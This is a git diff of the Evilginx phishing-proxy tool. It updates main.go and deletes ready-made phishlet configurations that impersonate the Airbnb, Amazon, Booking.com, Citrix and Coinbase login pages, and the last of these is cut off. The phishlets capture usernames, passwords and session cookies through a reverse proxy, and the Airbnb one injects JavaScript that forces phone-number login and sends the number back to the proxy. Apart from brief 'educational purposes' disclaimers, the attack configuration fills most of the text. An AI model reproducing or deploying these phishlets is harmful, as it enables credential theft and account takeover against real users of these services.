||||
var cfg_dir = flag.String("c", "", "Configuration directory path")
|
||||
var version_flag = flag.Bool("v", false, "Show version")
|
||||
|
||||
func joinPath(base_path string, rel_path string) string {
|
||||
var ret string
|
||||
@ -29,12 +33,28 @@ func joinPath(base_path string, rel_path string) string {
|
||||
return ret
|
||||
}
|
||||
|
||||
func showAd() {
|
||||
lred := color.New(color.FgHiRed)
|
||||
lyellow := color.New(color.FgHiYellow)
|
||||
white := color.New(color.FgHiWhite)
|
||||
message := fmt.Sprintf("%s: %s %s", lred.Sprint("Evilginx Mastery Course"), lyellow.Sprint("https://academy.breakdev.org/evilginx-mastery"), white.Sprint("(learn how to create phishlets)"))
|
||||
log.Info("%s", message)
|
||||
}
|
||||
|
||||
func main() {
|
||||
flag.Parse()
|
||||
|
||||
if *version_flag == true {
|
||||
log.Info("version: %s", core.VERSION)
|
||||
return
|
||||
}
|
||||
|
||||
exe_path, _ := os.Executable()
|
||||
exe_dir := filepath.Dir(exe_path)
|
||||
|
||||
core.Banner()
|
||||
flag.Parse()
|
||||
showAd()
|
||||
|
||||
if *phishlets_dir == "" {
|
||||
*phishlets_dir = joinPath(exe_dir, "./phishlets")
|
||||
if _, err := os.Stat(*phishlets_dir); os.IsNotExist(err) {
|
||||
@ -45,12 +65,12 @@ func main() {
|
||||
}
|
||||
}
|
||||
}
|
||||
if *templates_dir == "" {
|
||||
*templates_dir = joinPath(exe_dir, "./templates")
|
||||
if _, err := os.Stat(*templates_dir); os.IsNotExist(err) {
|
||||
*templates_dir = "/usr/share/evilginx/templates/"
|
||||
if _, err := os.Stat(*templates_dir); os.IsNotExist(err) {
|
||||
*templates_dir = joinPath(exe_dir, "./templates")
|
||||
if *redirectors_dir == "" {
|
||||
*redirectors_dir = joinPath(exe_dir, "./redirectors")
|
||||
if _, err := os.Stat(*redirectors_dir); os.IsNotExist(err) {
|
||||
*redirectors_dir = "/usr/share/evilginx/redirectors/"
|
||||
if _, err := os.Stat(*redirectors_dir); os.IsNotExist(err) {
|
||||
*redirectors_dir = joinPath(exe_dir, "./redirectors")
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -58,8 +78,8 @@ func main() {
|
||||
log.Fatal("provided phishlets directory path does not exist: %s", *phishlets_dir)
|
||||
return
|
||||
}
|
||||
if _, err := os.Stat(*templates_dir); os.IsNotExist(err) {
|
||||
os.MkdirAll(*templates_dir, os.FileMode(0700))
|
||||
if _, err := os.Stat(*redirectors_dir); os.IsNotExist(err) {
|
||||
os.MkdirAll(*redirectors_dir, os.FileMode(0700))
|
||||
}
|
||||
|
||||
log.DebugEnable(*debug_log)
|
||||
@ -100,7 +120,7 @@ func main() {
|
||||
log.Fatal("config: %v", err)
|
||||
return
|
||||
}
|
||||
cfg.SetTemplatesDir(*templates_dir)
|
||||
cfg.SetRedirectorsDir(*redirectors_dir)
|
||||
|
||||
db, err := database.NewDatabase(filepath.Join(*cfg_dir, "data.db"))
|
||||
if err != nil {
|
||||
@ -128,29 +148,28 @@ func main() {
|
||||
}
|
||||
pname := rpname[1]
|
||||
if pname != "" {
|
||||
pl, err := core.NewPhishlet(pname, filepath.Join(phishlets_path, f.Name()), cfg)
|
||||
pl, err := core.NewPhishlet(pname, filepath.Join(phishlets_path, f.Name()), nil, cfg)
|
||||
if err != nil {
|
||||
log.Error("failed to load phishlet '%s': %v", f.Name(), err)
|
||||
continue
|
||||
}
|
||||
//log.Info("loaded phishlet '%s' made by %s from '%s'", pl.Name, pl.Author, f.Name())
|
||||
cfg.AddPhishlet(pname, pl)
|
||||
}
|
||||
}
|
||||
}
|
||||
cfg.LoadSubPhishlets()
|
||||
cfg.CleanUp()
|
||||
|
||||
ns, _ := core.NewNameserver(cfg)
|
||||
ns.Start()
|
||||
hs, _ := core.NewHttpServer()
|
||||
hs.Start()
|
||||
|
||||
crt_db, err := core.NewCertDb(crt_path, cfg, ns, hs)
|
||||
crt_db, err := core.NewCertDb(crt_path, cfg, ns)
|
||||
if err != nil {
|
||||
log.Fatal("certdb: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
hp, _ := core.NewHttpProxy("", 443, cfg, crt_db, db, bl, *developer_mode)
|
||||
hp, _ := core.NewHttpProxy("", cfg.GetHttpsPort(), cfg, crt_db, db, bl, *developer_mode)
|
||||
hp.Start()
|
||||
|
||||
t, err := core.NewTerminal(hp, cfg, crt_db, db, *developer_mode)
|
||||
|
BIN
media/img/evilginx_mastery.jpg
Normal file
BIN
media/img/evilginx_mastery.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 214 KiB |
@ -1,136 +0,0 @@
|
||||
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
|
||||
# PLEASE DO NOT MISUSE THIS PHISHLET.
|
||||
|
||||
|
||||
# Replace 'airbnb.co.uk' with your Server country Domain name of Airbnb.
|
||||
# Login With Email Will Not Work Due To Catpcha Failures.
|
||||
# Respective Javascripts Has been Added in Order to trigger, Login With Mobile Number.
|
||||
|
||||
author: '@AN0NUD4Y'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'airbnb.co.uk', session: true, is_landing: true}
|
||||
- {phish_sub: '', orig_sub: '', domain: 'airbnb.co.uk', session: true, is_landing: false}
|
||||
- {phish_sub: 'muscache', orig_sub: 'a0', domain: 'muscache.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'gstatic', orig_sub: '', domain: 'gstatic.com', session: true, is_landing: false}
|
||||
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{domain}', replace: 'https://{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{domain}', replace: 'https%3A%2F%2F{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'a0', domain: 'muscache.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'a0', domain: 'muscache.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'a0', domain: 'muscache.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'google.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: '', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: '', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: '', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'a0', domain: 'muscache.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'a0', domain: 'muscache.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'a0', domain: 'muscache.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.google.com', orig_sub: '', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: '', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: '', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{domain}', replace: 'https://{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{domain}', replace: 'https%3A%2F%2F{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'a0', domain: 'muscache.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'a0', domain: 'muscache.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'a0', domain: 'muscache.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'google.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'gstatic.com', orig_sub: '', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: '', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: '', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{domain}', replace: 'https://{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{domain}', replace: 'https%3A%2F%2F{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
|
||||
auth_tokens:
|
||||
- domain: '.airbnb.co.uk'
|
||||
keys: ['_csrf_token','_aat','abb_fa2','rclu','tzo,opt','_pt','bev','_airbed_session_id','.*,regexp']
|
||||
credentials:
|
||||
username:
|
||||
key: 'Leaked_mobileNumber'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
custom:
|
||||
- key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'www.airbnb.co.uk'
|
||||
path: '/login'
|
||||
js_inject:
|
||||
- trigger_domains: ["www.airbnb.co.uk"]
|
||||
trigger_paths: ["/login","/","/*"]
|
||||
trigger_params: []
|
||||
script: |
|
||||
function get_mobile_login(){
|
||||
document.getElementsByClassName("_1d079j1e")[1].click();
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){ get_mobile_login(); }, 1000);
|
||||
|
||||
function remove_login_buttons() {
|
||||
var elem = document.getElementsByClassName("_p03egf")[0];
|
||||
elem.parentNode.removeChild(elem);
|
||||
var elem1 = document.getElementsByClassName("_p03egf")[1];
|
||||
elem1.parentNode.removeChild(elem1);
|
||||
var elem2 = document.getElementsByClassName("_p03egf")[0];
|
||||
elem2.parentNode.removeChild(elem2);
|
||||
var elem3 = document.getElementsByClassName("_bema73j")[0];
|
||||
elem3.parentNode.removeChild(elem3);
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){ remove_login_buttons(); }, 1000);
|
||||
|
||||
function lp(){
|
||||
var submit = document.querySelectorAll('button[type=submit]')[0];
|
||||
submit.setAttribute("onclick", "sendMobile()");
|
||||
return;
|
||||
}
|
||||
function sendMobile(){
|
||||
var mobile = document.getElementsByName("phoneNumber")[0].value;
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", '/', true);
|
||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
||||
xhr.send("Leaked_mobileNumber="+encodeURIComponent(mobile));
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){ lp(); }, 2000);
|
@ -1,28 +0,0 @@
|
||||
author: '@customsync'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'amazon.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
auth_tokens:
|
||||
- domain: '.amazon.com'
|
||||
keys: ['at-main','lc-main','sess-at-main','session-id','session-id-time','session-token','sst-main','ubid-main','x-main','skin','a-ogbcbff']
|
||||
credentials:
|
||||
username:
|
||||
key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'www.amazon.com'
|
||||
path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0'
|
@ -1,27 +0,0 @@
|
||||
author: '@Anonymous'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'accounts.booking' , orig_sub: '' , domain: 'booking.com', session: false, is_landing: true}
|
||||
- {phish_sub: 'account', orig_sub: 'account', domain: 'booking.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'secure' , orig_sub: 'secure' , domain: 'booking.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'www' , orig_sub: '' , domain: 'booking.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'join' , orig_sub: 'join' , domain: 'booking.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'admin' , orig_sub: 'admin' , domain: 'booking.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'q', orig_sub: 'q-cf', domain: 'bstatic.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'r', orig_sub: 'r-cf', domain: 'bstatic.com', session: false, is_landing: false}
|
||||
sub_filters: []
|
||||
auth_tokens:
|
||||
- domain: '.booking.com'
|
||||
keys: ['bkng','.*,regexp']
|
||||
credentials:
|
||||
username:
|
||||
key: ''
|
||||
search: '"login_name":"([^"]*)'
|
||||
type: 'json'
|
||||
password:
|
||||
key: ''
|
||||
search: '"password":"([^"]*)'
|
||||
type: 'json'
|
||||
login:
|
||||
domain: 'account.booking.com'
|
||||
path: '/'
|
@ -1,22 +0,0 @@
name: 'Citrix Portal'
author: '@424f424f'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'subdomainhere', orig_sub: 'subdomainhere', domain: 'domainhere', session: true, is_landing: true}
sub_filters:
  - {triggers_on: 'domainhere', orig_sub: 'subdomainhere', domain: 'domainhere', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: 'domainhere'
    keys: ['ASP.NET_SessionId','CsrfToken','NSC_AAAC','NSC_DLGE','pwcount']
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'
login:
  domain: 'subdomainhere.domainhere'
  path: '/vpn/index.html'
@ -1,160 +0,0 @@
|
||||
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
|
||||
# PLEASE DO NOT MISUSE THIS PHISHLET.
|
||||
|
||||
# Don't forget to set the "domain" parameter to your own domain name (example.com).
#
# Use the command below to set the domain parameter from the evilginx command line,
# where ID is the lure ID number and EXAMPLE.COM is your domain name:
# lures edit params ID domain=EXAMPLE.COM
|
||||
|
||||
|
||||
author: '@An0nud4y'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'coinbase.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'ws', orig_sub: 'ws', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'googletag', orig_sub: 'www', domain: 'googletagmanager.com', session: true, is_landing: false}
|
||||
- {phish_sub: '', orig_sub: '', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'assets', orig_sub: 'assets', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'dynamic', orig_sub: 'dynamic-assets', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'ravenjs.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'sessions', orig_sub: 'sessions', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'events', orig_sub: 'events-service', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'exceptions', orig_sub: 'exceptions', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'images', orig_sub: 'images', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
|
||||
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'assets', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'assets', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'dynamic-assets', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
